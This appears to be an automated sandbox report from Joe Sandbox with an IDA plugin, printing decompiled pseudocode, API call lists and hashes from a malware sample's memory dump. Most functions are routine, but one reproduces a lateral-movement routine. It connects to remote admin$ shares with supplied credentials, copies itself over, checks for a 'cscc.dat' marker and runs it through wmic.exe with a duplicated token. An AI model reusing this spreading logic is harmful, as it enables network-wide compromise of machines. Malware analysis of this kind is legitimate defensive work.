                                                                                                          0x04a47e60
                                                                                                          0x04a47e66

                                                                                                          APIs
                                                                                                            • Part of subcall function 04A46477: GetTickCount.KERNEL32 ref: 04A46477
                                                                                                          • NetServerGetInfo.NETAPI32(00000000,00000065,?,?,?,00000000,?,?,04A47AA3,?,?,000000FF,?,?), ref: 04A47DF6
                                                                                                          • NetApiBufferFree.NETAPI32(?,?,?,00000000,?,?,04A47AA3,?,?,000000FF,?,?), ref: 04A47E0F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BufferCountFreeInfoServerTick
                                                                                                          • String ID:
                                                                                                          • API String ID: 2934114180-0
                                                                                                          • Opcode ID: ea2662c56ffaf046e2171fecffd5d643d0a5e95fb74a838906ab15e176f00e91
                                                                                                          • Instruction ID: 5cd32fa404b97dfd179a55d4c6e33eb7c35cd97dcd974de3638e90c8150db048
                                                                                                          • Opcode Fuzzy Hash: ea2662c56ffaf046e2171fecffd5d643d0a5e95fb74a838906ab15e176f00e91
                                                                                                          • Instruction Fuzzy Hash: 2B11B6767002899FE724CF69D886FAEB7AAEBC0B10F184629E505DB180E774EE009750
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A46DA4(signed int __eax, void* __ecx, struct _CRITICAL_SECTION* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                          				signed int _v8;
                                                                                                          				signed int _t35;
                                                                                                          				signed int _t43;
                                                                                                          				intOrPtr* _t48;
                                                                                                          				signed int _t54;
                                                                                                          				struct _CRITICAL_SECTION* _t56;
                                                                                                          
                                                                                                          				_t56 = __esi;
                                                                                                          				_v8 = _v8 & 0x00000000;
                                                                                                          				_t43 = __eax;
                                                                                                          				if(__esi == 0) {
                                                                                                          					L8:
                                                                                                          					return _v8;
                                                                                                          				}
                                                                                                          				EnterCriticalSection(__esi);
                                                                                                          				_t54 = _t43;
                                                                                                          				if(_t43 >=  *((intOrPtr*)(__esi + 0x24)) + _t43) {
                                                                                                          					L7:
                                                                                                          					LeaveCriticalSection(_t56);
                                                                                                          					goto L8;
                                                                                                          				} else {
                                                                                                          					goto L2;
                                                                                                          				}
                                                                                                          				while(1) {
                                                                                                          					L2:
                                                                                                          					_t35 =  *((intOrPtr*)(_t56 + 0x2c))( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t56 + 0x18)) + _t54 %  *(_t56 + 0x24) * 4)))), _a4,  *((intOrPtr*)(_t56 + 0x1c)));
                                                                                                          					_v8 = _t35;
                                                                                                          					if(_t35 != 0) {
                                                                                                          						break;
                                                                                                          					}
                                                                                                          					_t54 = _t54 + 1;
                                                                                                          					if(_t54 <  *(_t56 + 0x24) + _t43) {
                                                                                                          						continue;
                                                                                                          					}
                                                                                                          					goto L7;
                                                                                                          				}
                                                                                                          				_t48 = _a8;
                                                                                                          				if(_t48 != 0) {
                                                                                                          					 *_t48 =  *((intOrPtr*)( *((intOrPtr*)(_t56 + 0x18)) + _t54 %  *(_t56 + 0x24) * 4));
                                                                                                          				}
                                                                                                          				goto L7;
                                                                                                          			}









                                                                                                          0x04a46da4
                                                                                                          0x04a46da8
                                                                                                          0x04a46dad
                                                                                                          0x04a46db1
                                                                                                          0x04a46e13
                                                                                                          0x04a46e18
                                                                                                          0x04a46e18
                                                                                                          0x04a46db5
                                                                                                          0x04a46dc0
                                                                                                          0x04a46dc4
                                                                                                          0x04a46e0b
                                                                                                          0x04a46e0c
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a46dc6
                                                                                                          0x04a46dc6
                                                                                                          0x04a46ddd
                                                                                                          0x04a46de0
                                                                                                          0x04a46de5
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a46dea
                                                                                                          0x04a46def
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a46df1
                                                                                                          0x04a46df3
                                                                                                          0x04a46df8
                                                                                                          0x04a46e09
                                                                                                          0x04a46e09
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000,?,?,?,04A46E98,?,00000000,?,?,04A46A84,?,?), ref: 04A46DB5
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,04A46E98,?,00000000,?,?,04A46A84,?,?), ref: 04A46E0C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                          • String ID:
                                                                                                          • API String ID: 3168844106-0
                                                                                                          • Opcode ID: 4ec1ec2174bf6c8bdb33cb1707eb26408342a5564027bd660c591cf3bf2ab033
                                                                                                          • Instruction ID: e862be88ac7344d063e73d59b79a4ffd0800f22d1ad3dcdccdc9ecd13a8c7fa4
                                                                                                          • Opcode Fuzzy Hash: 4ec1ec2174bf6c8bdb33cb1707eb26408342a5564027bd660c591cf3bf2ab033
                                                                                                          • Instruction Fuzzy Hash: 19115335701A109FC725CF6AC885A5EB7E6FFDA3047044529E846C7311DB39FA12CA90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 75%
                                                                                                          			E04A46AA8(WCHAR* _a4, WCHAR* _a8) {
                                                                                                          				signed int _t6;
                                                                                                          
                                                                                                          				if(_a4 == 0 || _a8 == 0) {
                                                                                                          					return 0;
                                                                                                          				} else {
                                                                                                          					_t6 = StrCmpIW(_a4, _a8); // executed
                                                                                                          					asm("sbb eax, eax");
                                                                                                          					return  ~_t6 + 1;
                                                                                                          				}
                                                                                                          			}




                                                                                                          0x04a46aaf
                                                                                                          0x00000000
                                                                                                          0x04a46ab7
                                                                                                          0x04a46abd
                                                                                                          0x04a46ac5
                                                                                                          0x00000000
                                                                                                          0x04a46ac7

                                                                                                          APIs
                                                                                                          • StrCmpIW.KERNELBASE(00000000,?), ref: 04A46ABD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d0ac9d7964f967df73e7fb4b9480eb09f2466c5c51148148caf69636196b2248
                                                                                                          • Instruction ID: 49d995e2ec96fbae9b12f520aefc5553939160110055722f0a8490731da93090
                                                                                                          • Opcode Fuzzy Hash: d0ac9d7964f967df73e7fb4b9480eb09f2466c5c51148148caf69636196b2248
                                                                                                          • Instruction Fuzzy Hash: C0D05E31254909EEDB115F64C808BBC37B8E7D1306F84C030B50A890E0D27991A8DA40
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A4C493(signed int _a8, signed int _a12) {
                                                                                                          				void* _t5;
                                                                                                          
                                                                                                          				_t5 = malloc(_a8 * _a12); // executed
                                                                                                          				return _t5;
                                                                                                          			}




                                                                                                          0x04a4c49e
                                                                                                          0x04a4c4a5

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 2803490479-0
                                                                                                          • Opcode ID: 4f30984e569958c364644897db368958a38db670780f4f6cfd8e814dd52d1b5e
                                                                                                          • Instruction ID: 3f7506f3f466df24b9ec3e6540db788876e13edad080926ccb7c9b7e62f3f3c0
                                                                                                          • Opcode Fuzzy Hash: 4f30984e569958c364644897db368958a38db670780f4f6cfd8e814dd52d1b5e
                                                                                                          • Instruction Fuzzy Hash: 97B0123315830D5BAF04EED8EB82C5E73DCEBE8624B404406F91C8F140E971F6104659
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 61%
                                                                                                          			E04A49B63(long _a4, short* _a8, short* _a12, signed int _a16) {
                                                                                                          				long _v8;
                                                                                                          				void* _v12;
                                                                                                          				int _v16;
                                                                                                          				void* _v20;
                                                                                                          				int _v24;
                                                                                                          				signed int _v28;
                                                                                                          				void* _v40;
                                                                                                          				void* _v44;
                                                                                                          				void* _v52;
                                                                                                          				void* _v56;
                                                                                                          				void* _v60;
                                                                                                          				short _v68;
                                                                                                          				intOrPtr _v72;
                                                                                                          				void _v112;
                                                                                                          				char _v116;
                                                                                                          				short* _v128;
                                                                                                          				void _v144;
                                                                                                          				struct _NETRESOURCE _v148;
                                                                                                          				short _v668;
                                                                                                          				char _v1188;
                                                                                                          				short _v2748;
                                                                                                          				short _v4796;
                                                                                                          				short _v6844;
                                                                                                          				short _v8892;
                                                                                                          				short _v74428;
                                                                                                          				void* __ebx;
                                                                                                          				signed int _t112;
                                                                                                          				WCHAR* _t130;
                                                                                                          				void* _t141;
                                                                                                          				int _t144;
                                                                                                          				int _t150;
                                                                                                          				long _t151;
                                                                                                          				signed int _t163;
                                                                                                          				int _t168;
                                                                                                          				signed int _t173;
                                                                                                          				long _t184;
                                                                                                          				WCHAR* _t187;
                                                                                                          				int _t189;
                                                                                                          				signed int _t192;
                                                                                                          				int _t199;
                                                                                                          				void* _t205;
                                                                                                          
                                                                                                          				E04A4A760(0x122bc);
                                                                                                          				_v16 = 0;
                                                                                                          				_v8 = 0;
                                                                                                          				_v24 = 0;
                                                                                                          				if(_a4 == 0) {
                                                                                                          					_v8 = 0x57;
                                                                                                          					L51:
                                                                                                          					_t112 = _a16;
                                                                                                          					__eflags = _t112;
                                                                                                          					if(_t112 != 0) {
                                                                                                          						 *_t112 = _v24;
                                                                                                          					}
                                                                                                          					SetLastError(_v8);
                                                                                                          					return _v16;
                                                                                                          				}
                                                                                                          				_v668 = 0;
                                                                                                          				wsprintfW( &_v668, L"\\\\%s\\admin$", _a4);
                                                                                                          				_v148 = 0;
                                                                                                          				_t192 = 7;
                                                                                                          				memset( &_v144, 0, _t192 << 2);
                                                                                                          				_v128 =  &_v668;
                                                                                                          				_t199 = 1;
                                                                                                          				_v144 = 1;
                                                                                                          				E04A488D3( &_v1188);
                                                                                                          				_t187 = L"\\\\%ws\\admin$\\%ws";
                                                                                                          				wsprintfW( &_v6844, _t187, _a4,  &_v1188);
                                                                                                          				_v4796 = 0;
                                                                                                          				_v8892 = 0;
                                                                                                          				wsprintfW( &_v4796, _t187, _a4,  &_v1188);
                                                                                                          				_t130 = PathFindExtensionW( &_v4796);
                                                                                                          				if(_t130 != 0) {
                                                                                                          					 *_t130 = 0;
                                                                                                          				}
                                                                                                          				wsprintfW( &_v8892, _t187, _a4, L"cscc.dat");
                                                                                                          				_v28 = _v28 & 0x00000000;
                                                                                                          				while(1) {
                                                                                                          					_v24 = WNetAddConnection2W( &_v148, _a12, _a8, 0);
                                                                                                          					if(PathFileExistsW( &_v8892) != 0) {
                                                                                                          						break;
                                                                                                          					}
                                                                                                          					_v8 = GetLastError();
                                                                                                          					_t141 = E04A487E7( *0x4a57b94,  &_v6844,  *0x4a53984);
                                                                                                          					_t189 = 0;
                                                                                                          					if(_t141 != 0) {
                                                                                                          						__eflags = _a8;
                                                                                                          						if(_a8 != 0) {
                                                                                                          							__eflags = _a12;
                                                                                                          							if(_a12 != 0) {
                                                                                                          								E04A468B5(_a8, _a12);
                                                                                                          								 *0x4a53010 = _t199;
                                                                                                          							}
                                                                                                          						}
                                                                                                          						_v20 = _t189;
                                                                                                          						_v12 = _t189;
                                                                                                          						_t144 = OpenThreadToken(GetCurrentThread(), 2, _t199,  &_v20);
                                                                                                          						__eflags = _t144;
                                                                                                          						if(_t144 != 0) {
                                                                                                          							DuplicateTokenEx(_v20, 0x2000000, _t189, 2, _t199,  &_v12);
                                                                                                          						}
                                                                                                          						_v74428 = 0;
                                                                                                          						_v2748 = 0;
                                                                                                          						_v44 = _t189;
                                                                                                          						asm("stosd");
                                                                                                          						asm("stosd");
                                                                                                          						asm("stosd");
                                                                                                          						memset( &_v112, _t189, 0x40);
                                                                                                          						_v68 = 0;
                                                                                                          						_v116 = 0x44;
                                                                                                          						_v72 = 1;
                                                                                                          						_t150 = GetSystemDirectoryW( &_v2748, 0x104);
                                                                                                          						__eflags = _t150;
                                                                                                          						if(_t150 == 0) {
                                                                                                          							_t151 = GetLastError();
                                                                                                          							goto L39;
                                                                                                          						} else {
                                                                                                          							PathAppendW( &_v2748, L"wbem\\wmic.exe");
                                                                                                          							__eflags = PathFileExistsW( &_v2748);
                                                                                                          							if(__eflags == 0) {
                                                                                                          								L41:
                                                                                                          								DeleteFileW( &_v6844);
                                                                                                          								L43:
                                                                                                          								__eflags = _v12 - _t189;
                                                                                                          								if(_v12 != _t189) {
                                                                                                          									CloseHandle(_v12);
                                                                                                          									_v12 = _t189;
                                                                                                          								}
                                                                                                          								__eflags = _v20 - _t189;
                                                                                                          								if(_v20 != _t189) {
                                                                                                          									CloseHandle(_v20);
                                                                                                          								}
                                                                                                          								_t199 = 1;
                                                                                                          								__eflags = 1;
                                                                                                          								L48:
                                                                                                          								__eflags = _v24;
                                                                                                          								if(_v24 == 0) {
                                                                                                          									WNetCancelConnection2W( &_v668, 0, _t199);
                                                                                                          								}
                                                                                                          								goto L51;
                                                                                                          							}
                                                                                                          							_t163 = E04A49972(_t205 + wsprintfW( &_v74428, L"%ws ",  &_v2748) * 2 - 0x122b8, __eflags, _a4, _a8, _a12);
                                                                                                          							__eflags = _t163;
                                                                                                          							if(_t163 == 0) {
                                                                                                          								L37:
                                                                                                          								_t151 = GetLastError();
                                                                                                          								_t189 = 0;
                                                                                                          								L39:
                                                                                                          								_v8 = _t151;
                                                                                                          								L40:
                                                                                                          								__eflags = _v16 - _t189;
                                                                                                          								if(_v16 != _t189) {
                                                                                                          									goto L43;
                                                                                                          								}
                                                                                                          								goto L41;
                                                                                                          							}
                                                                                                          							_push( &_v44);
                                                                                                          							_push( &_v116);
                                                                                                          							_push(0);
                                                                                                          							_push(0);
                                                                                                          							_push(0x8000000);
                                                                                                          							_push(0);
                                                                                                          							_push(0);
                                                                                                          							_push(0);
                                                                                                          							_push( &_v74428);
                                                                                                          							_push( &_v2748);
                                                                                                          							__eflags = _v12;
                                                                                                          							if(_v12 == 0) {
                                                                                                          								_t168 = CreateProcessW();
                                                                                                          							} else {
                                                                                                          								_t168 = CreateProcessAsUserW(_v12, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??);
                                                                                                          							}
                                                                                                          							__eflags = _t168;
                                                                                                          							if(_t168 == 0) {
                                                                                                          								goto L37;
                                                                                                          							} else {
                                                                                                          								WaitForSingleObject(_v44, 0xffffffff);
                                                                                                          								_a4 = 0;
                                                                                                          								GetExitCodeProcess(_v44,  &_a4);
                                                                                                          								__eflags = _v52;
                                                                                                          								if(_v52 != 0) {
                                                                                                          									CloseHandle(_v52);
                                                                                                          								}
                                                                                                          								__eflags = _v60;
                                                                                                          								if(_v60 != 0) {
                                                                                                          									CloseHandle(_v60);
                                                                                                          								}
                                                                                                          								__eflags = _v56;
                                                                                                          								if(_v56 != 0) {
                                                                                                          									CloseHandle(_v56);
                                                                                                          								}
                                                                                                          								__eflags = _v40;
                                                                                                          								if(_v40 != 0) {
                                                                                                          									CloseHandle(_v40);
                                                                                                          								}
                                                                                                          								__eflags = _v44;
                                                                                                          								if(_v44 != 0) {
                                                                                                          									CloseHandle(_v44);
                                                                                                          								}
                                                                                                          								__eflags = _a4;
                                                                                                          								_t173 = 0 | _a4 == 0x00000000;
                                                                                                          								_v16 = _t173;
                                                                                                          								__eflags = _t173;
                                                                                                          								if(_t173 != 0) {
                                                                                                          									_t189 = 0;
                                                                                                          									__eflags = 0;
                                                                                                          									goto L43;
                                                                                                          								} else {
                                                                                                          									_v16 = PathFileExistsW( &_v4796);
                                                                                                          									_t189 = 0;
                                                                                                          									goto L40;
                                                                                                          								}
                                                                                                          							}
                                                                                                          						}
                                                                                                          					}
                                                                                                          					_t184 = GetLastError();
                                                                                                          					_v8 = _t184;
                                                                                                          					if(_t184 == 0x50 || _t184 == 0x35 || _t184 == 0x43 || _v24 != 0x4c3) {
                                                                                                          						goto L48;
                                                                                                          					} else {
                                                                                                          						if(_v28 != 0) {
                                                                                                          							goto L51;
                                                                                                          						}
                                                                                                          						WNetCancelConnection2W( &_v668, 0, _t199);
                                                                                                          						_v28 = _t199;
                                                                                                          						continue;
                                                                                                          					}
                                                                                                          				}
                                                                                                          				_v16 = _t199;
                                                                                                          				goto L48;
                                                                                                          			}












































                                                                                                          0x04a49b6b
                                                                                                          0x04a49b75
                                                                                                          0x04a49b78
                                                                                                          0x04a49b7b
                                                                                                          0x04a49b81
                                                                                                          0x04a49f01
                                                                                                          0x04a49f08
                                                                                                          0x04a49f08
                                                                                                          0x04a49f0b
                                                                                                          0x04a49f0d
                                                                                                          0x04a49f12
                                                                                                          0x04a49f12
                                                                                                          0x04a49f17
                                                                                                          0x04a49f24
                                                                                                          0x04a49f24
                                                                                                          0x04a49b92
                                                                                                          0x04a49ba5
                                                                                                          0x04a49baa
                                                                                                          0x04a49bb4
                                                                                                          0x04a49bbb
                                                                                                          0x04a49bc3
                                                                                                          0x04a49bce
                                                                                                          0x04a49bd0
                                                                                                          0x04a49bd6
                                                                                                          0x04a49be5
                                                                                                          0x04a49bf2
                                                                                                          0x04a49bf6
                                                                                                          0x04a49bfd
                                                                                                          0x04a49c16
                                                                                                          0x04a49c22
                                                                                                          0x04a49c2a
                                                                                                          0x04a49c2e
                                                                                                          0x04a49c2e
                                                                                                          0x04a49c41
                                                                                                          0x04a49c46
                                                                                                          0x04a49c4a
                                                                                                          0x04a49c5f
                                                                                                          0x04a49c71
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a49c85
                                                                                                          0x04a49c8f
                                                                                                          0x04a49c94
                                                                                                          0x04a49c98
                                                                                                          0x04a49cf3
                                                                                                          0x04a49cf6
                                                                                                          0x04a49cf8
                                                                                                          0x04a49cfb
                                                                                                          0x04a49d03
                                                                                                          0x04a49d08
                                                                                                          0x04a49d08
                                                                                                          0x04a49cfb
                                                                                                          0x04a49d15
                                                                                                          0x04a49d18
                                                                                                          0x04a49d22
                                                                                                          0x04a49d28
                                                                                                          0x04a49d2a
                                                                                                          0x04a49d3c
                                                                                                          0x04a49d3c
                                                                                                          0x04a49d44
                                                                                                          0x04a49d4b
                                                                                                          0x04a49d52
                                                                                                          0x04a49d58
                                                                                                          0x04a49d59
                                                                                                          0x04a49d5c
                                                                                                          0x04a49d62
                                                                                                          0x04a49d6c
                                                                                                          0x04a49d7c
                                                                                                          0x04a49d83
                                                                                                          0x04a49d8a
                                                                                                          0x04a49d96
                                                                                                          0x04a49d98
                                                                                                          0x04a49eb0
                                                                                                          0x00000000
                                                                                                          0x04a49d9e
                                                                                                          0x04a49daa
                                                                                                          0x04a49dbd
                                                                                                          0x04a49dbf
                                                                                                          0x04a49ebe
                                                                                                          0x04a49ec5
                                                                                                          0x04a49ecf
                                                                                                          0x04a49ecf
                                                                                                          0x04a49ed2
                                                                                                          0x04a49ed7
                                                                                                          0x04a49ed9
                                                                                                          0x04a49ed9
                                                                                                          0x04a49edc
                                                                                                          0x04a49edf
                                                                                                          0x04a49ee4
                                                                                                          0x04a49ee4
                                                                                                          0x04a49ee8
                                                                                                          0x04a49ee8
                                                                                                          0x04a49ee9
                                                                                                          0x04a49ee9
                                                                                                          0x04a49eed
                                                                                                          0x04a49ef9
                                                                                                          0x04a49ef9
                                                                                                          0x00000000
                                                                                                          0x04a49eed
                                                                                                          0x04a49ded
                                                                                                          0x04a49df2
                                                                                                          0x04a49df4
                                                                                                          0x04a49ea6
                                                                                                          0x04a49ea6
                                                                                                          0x04a49eac
                                                                                                          0x04a49eb6
                                                                                                          0x04a49eb6
                                                                                                          0x04a49eb9
                                                                                                          0x04a49eb9
                                                                                                          0x04a49ebc
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a49ebc
                                                                                                          0x04a49dfd
                                                                                                          0x04a49e03
                                                                                                          0x04a49e04
                                                                                                          0x04a49e05
                                                                                                          0x04a49e06
                                                                                                          0x04a49e0b
                                                                                                          0x04a49e0c
                                                                                                          0x04a49e13
                                                                                                          0x04a49e14
                                                                                                          0x04a49e1b
                                                                                                          0x04a49e1c
                                                                                                          0x04a49e1f
                                                                                                          0x04a49e2c
                                                                                                          0x04a49e21
                                                                                                          0x04a49e24
                                                                                                          0x04a49e24
                                                                                                          0x04a49e32
                                                                                                          0x04a49e34
                                                                                                          0x00000000
                                                                                                          0x04a49e36
                                                                                                          0x04a49e3b
                                                                                                          0x04a49e48
                                                                                                          0x04a49e4b
                                                                                                          0x04a49e51
                                                                                                          0x04a49e54
                                                                                                          0x04a49e59
                                                                                                          0x04a49e59
                                                                                                          0x04a49e5b
                                                                                                          0x04a49e5e
                                                                                                          0x04a49e63
                                                                                                          0x04a49e63
                                                                                                          0x04a49e65
                                                                                                          0x04a49e68
                                                                                                          0x04a49e6d
                                                                                                          0x04a49e6d
                                                                                                          0x04a49e6f
                                                                                                          0x04a49e72
                                                                                                          0x04a49e77
                                                                                                          0x04a49e77
                                                                                                          0x04a49e79
                                                                                                          0x04a49e7c
                                                                                                          0x04a49e81
                                                                                                          0x04a49e81
                                                                                                          0x04a49e85
                                                                                                          0x04a49e88
                                                                                                          0x04a49e8b
                                                                                                          0x04a49e8e
                                                                                                          0x04a49e90
                                                                                                          0x04a49ecd
                                                                                                          0x04a49ecd
                                                                                                          0x00000000
                                                                                                          0x04a49e92
                                                                                                          0x04a49e9f
                                                                                                          0x04a49ea2
                                                                                                          0x00000000
                                                                                                          0x04a49ea2
                                                                                                          0x04a49e90
                                                                                                          0x04a49e34
                                                                                                          0x04a49d98
                                                                                                          0x04a49c9a
                                                                                                          0x04a49ca0
                                                                                                          0x04a49ca6
                                                                                                          0x00000000
                                                                                                          0x04a49ccb
                                                                                                          0x04a49cce
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a49cdd
                                                                                                          0x04a49ce3
                                                                                                          0x00000000
                                                                                                          0x04a49ce3
                                                                                                          0x04a49ca6
                                                                                                          0x04a49ceb
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          • wsprintfW.USER32 ref: 04A49BA5
                                                                                                            • Part of subcall function 04A488D3: PathFindFileNameW.SHLWAPI(04A57BC8,775EC0B0,?,04A495B2), ref: 04A488E3
                                                                                                          • wsprintfW.USER32 ref: 04A49BF2
                                                                                                          • wsprintfW.USER32 ref: 04A49C16
                                                                                                          • PathFindExtensionW.SHLWAPI(?), ref: 04A49C22
                                                                                                          • wsprintfW.USER32 ref: 04A49C41
                                                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 04A49C59
                                                                                                          • PathFileExistsW.SHLWAPI(?), ref: 04A49C69
                                                                                                          • GetLastError.KERNEL32 ref: 04A49C73
                                                                                                          • GetLastError.KERNEL32(?), ref: 04A49C9A
                                                                                                          • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 04A49CDD
                                                                                                          • GetCurrentThread.KERNEL32 ref: 04A49D1B
                                                                                                          • OpenThreadToken.ADVAPI32(00000000), ref: 04A49D22
                                                                                                          • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000001,?), ref: 04A49D3C
                                                                                                          • memset.MSVCRT ref: 04A49D62
                                                                                                          • GetSystemDirectoryW.KERNEL32 ref: 04A49D8A
                                                                                                          • PathAppendW.SHLWAPI(?,wbem\wmic.exe), ref: 04A49DAA
                                                                                                          • PathFileExistsW.SHLWAPI(?), ref: 04A49DB7
                                                                                                          • wsprintfW.USER32 ref: 04A49DD8
                                                                                                          • CreateProcessAsUserW.ADVAPI32(?,?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,?), ref: 04A49E24
                                                                                                          • CreateProcessW.KERNEL32 ref: 04A49E2C
                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000104), ref: 04A49E3B
                                                                                                          • GetExitCodeProcess.KERNEL32 ref: 04A49E4B
                                                                                                          • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04A49E59
                                                                                                          • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04A49E63
                                                                                                          • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04A49E6D
                                                                                                          • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04A49E77
                                                                                                          • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04A49E81
                                                                                                          • PathFileExistsW.SHLWAPI(?,?,?,00000104), ref: 04A49E99
                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000104), ref: 04A49EA6
                                                                                                          • DeleteFileW.KERNEL32(?), ref: 04A49EC5
                                                                                                          • CloseHandle.KERNEL32(?), ref: 04A49ED7
                                                                                                          • CloseHandle.KERNEL32(?), ref: 04A49EE4
                                                                                                            • Part of subcall function 04A468B5: GetProcessHeap.KERNEL32(00000008,?,775EC0B0,00000000), ref: 04A468EB
                                                                                                            • Part of subcall function 04A468B5: HeapAlloc.KERNEL32(00000000), ref: 04A468F4
                                                                                                            • Part of subcall function 04A468B5: memcpy.MSVCRT ref: 04A46921
                                                                                                            • Part of subcall function 04A468B5: GetProcessHeap.KERNEL32(00000008,?,74714D40), ref: 04A46946
                                                                                                            • Part of subcall function 04A468B5: HeapAlloc.KERNEL32(00000000), ref: 04A46949
                                                                                                            • Part of subcall function 04A468B5: memcpy.MSVCRT ref: 04A46978
                                                                                                            • Part of subcall function 04A468B5: GetProcessHeap.KERNEL32(00000000,?,?), ref: 04A46995
                                                                                                            • Part of subcall function 04A468B5: HeapFree.KERNEL32(00000000), ref: 04A46998
                                                                                                            • Part of subcall function 04A468B5: GetProcessHeap.KERNEL32(00000000,?), ref: 04A4699F
                                                                                                            • Part of subcall function 04A468B5: HeapFree.KERNEL32(00000000), ref: 04A469A2
                                                                                                          • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 04A49EF9
                                                                                                          • SetLastError.KERNEL32(00000057,00000000,00000000,00000000,?,04A49FCE,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000003,?), ref: 04A49F17
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
